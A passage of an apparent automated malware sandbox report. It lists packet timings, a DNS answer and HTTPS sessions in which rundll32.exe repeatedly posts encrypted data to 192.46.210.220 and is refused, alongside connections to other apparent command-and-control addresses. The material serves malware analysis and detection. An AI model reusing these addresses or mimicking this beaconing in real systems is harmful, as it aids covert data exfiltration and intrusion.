                                                                                                        Oct 28, 2021 04:57:58.848855972 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:58.852910995 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:58.852999926 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:58.853028059 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:59.560364962 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:59.560451031 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:59.560545921 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:59.560569048 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:59.572635889 CEST49747443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:57:59.572674990 CEST44349747192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:57:59.728296041 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:57:59.888998032 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:57:59.889239073 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:57:59.890458107 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.048832893 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:00.050988913 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:00.051131010 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.411868095 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.569957018 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:00.570770979 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:00.570889950 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.572593927 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.572730064 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:00.730981112 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:00.731003046 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.045767069 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.045819044 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.046087027 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.068650961 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.068682909 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.118796110 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.118822098 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.118881941 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:01.118933916 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:01.126609087 CEST49748808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:01.253654957 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.284967899 CEST80849748143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.420034885 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.422132969 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.422914028 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.589122057 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.590126991 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.590590954 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.596137047 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.596292019 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.598588943 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.765196085 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.765328884 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.766067028 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.766206980 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:01.854011059 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.854048014 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.854454994 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.854542971 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.859524012 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.859631062 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:01.859678030 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.932539940 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:01.932564974 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.314405918 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.314426899 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.314666986 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:02.352703094 CEST497506891192.168.2.645.77.0.96
                                                                                                        Oct 28, 2021 04:58:02.519212961 CEST68914975045.77.0.96192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.570838928 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.570916891 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.570919991 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:02.570987940 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:02.574436903 CEST49749443192.168.2.6192.46.210.220
                                                                                                        Oct 28, 2021 04:58:02.574465990 CEST44349749192.46.210.220192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.766282082 CEST49756808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:02.767570972 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.827249050 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.827380896 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.828815937 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.888236046 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.901067972 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.901098013 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.901236057 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.910237074 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.927395105 CEST80849756143.244.140.214192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.927536964 CEST49756808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:02.928477049 CEST49756808192.168.2.6143.244.140.214
                                                                                                        Oct 28, 2021 04:58:02.970412970 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:02.970511913 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.995630026 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:02.995762110 CEST497558116192.168.2.6185.56.219.47
                                                                                                        Oct 28, 2021 04:58:03.055043936 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:03.055646896 CEST811649755185.56.219.47192.168.2.6
                                                                                                        Oct 28, 2021 04:58:03.089015961 CEST80849756143.244.140.214192.168.2.6

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Oct 28, 2021 05:01:42.914350033 CEST8.8.8.8192.168.2.60x739bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 192.46.210.220

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.649747192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:57:58 UTC0OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:57:58 UTC0OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:57:59 UTC4INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:57:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.649749192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:01 UTC4OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:01 UTC5OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:02 UTC9INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.649796192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:20 UTC49OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:20 UTC49OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:21 UTC54INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.649801192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:23 UTC54OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:23 UTC54OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:23 UTC59INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:23 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.649803192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:25 UTC59OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:25 UTC59OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:25 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:25 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.649809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:27 UTC64OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:27 UTC64OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:28 UTC69INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.649811192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:28 UTC69OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:28 UTC69OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:29 UTC74INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:29 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.649817192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:31 UTC74OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:31 UTC74OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:32 UTC79INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.649819192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:32 UTC79OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:32 UTC79OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:33 UTC84INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:33 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.649825192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:35 UTC84OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
